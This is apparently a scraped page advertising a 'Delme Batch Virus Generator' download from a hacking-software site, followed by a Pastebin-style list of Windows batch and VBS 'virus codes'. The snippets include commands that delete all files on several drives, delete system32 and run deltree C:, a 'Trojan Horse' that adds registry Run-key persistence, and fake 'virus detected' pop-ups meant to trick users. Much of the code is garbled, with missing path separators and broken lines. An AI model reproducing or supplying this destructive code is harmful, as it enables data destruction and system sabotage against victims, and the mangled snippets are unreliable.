- Delme Batch Virus Generator V2.0
- Delme Bat Virus Maker
- Delme Batch Virus Generator
- Delme S Batch Virus Generator Download
Delme Batch Virus Generator V2.0
- Free download DELmEs Batch Virus Generator.zip by using Hacking Software Download Center (HSDC). This DELmEs Batch Virus Generator.zip software mainly categories in Viruses-Worms section. Also You can find out many software like DELmEs Batch Virus Generator.zip.
- DELmE's Batch Virus Generator is an amazing virus creation program with lots of options to infect the victim PC such as format C: drive, delete all files, disable admin, clean registry, change home page, kill tasks, antivirus and firewall and lots more.
May 18th, 2015
Delme Bat Virus Maker
Delme's viruses generator is a amazing viruses creator with lots of features to infect victim's Computer like format C drive,delete all files,disable admin,clean registry,kill task manger,hide CMD windows,disable mouse,keyboard and internet and much more.
Never
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
Delme Batch Virus Generator
- Virus codes | @echo off (cmd wont show command) @echo on (cmd will show command)
- #1 simple virus (opening-cpu drain)
- @echo off
- start
- goto :A
- #2 simple shutdown command - not really a virus
- shutdown -s -t 00<(time) -c 'message here' (you dont need a message)
- #3 make a bunch of folders to the desktop - not really a virus
- @echo off
- cd 'c: documents and settings%username% <<(or) documents and settingsall usersdesktop'
- md %random%
- :A
- (if you want to add more sites add the start (URL here) command here and below)
- goto :A
- #5 system 32 deleter (HARMFUL)
- @echo off del c:windowssystem 32 (extesion.bat)
- (DO NOT CREATE ON YOUR MAIN MACHINE)
- #6 delete every file off computer
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- Start Crash
- (you can copy and paste Start Crash over and over again for more power)
- X=Msgbox('Virus Is Active',0+16,'Virus Alert')
- X=Msgbox('Wanna Fix Virus',0+16,'Fix Virus')
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- :A
- ping localhost -m 5 >nul
- This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
- #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
- X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected')
- You can copy and paste this to have more messages pop up. (you have to run in VBs)
- #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
- @echo off
- Start C:Programsvirus.bat
- echo break off>>c:windowswimn32.bat
- echo end>>c:windowswimn32.bat
- reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
- reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
- PAUSE
- :top
- GOTO top
- Set wshShell =wscript.CreateObject(”WScript.Shell”)
- wscript.sleep 100
- loop
- deltree C: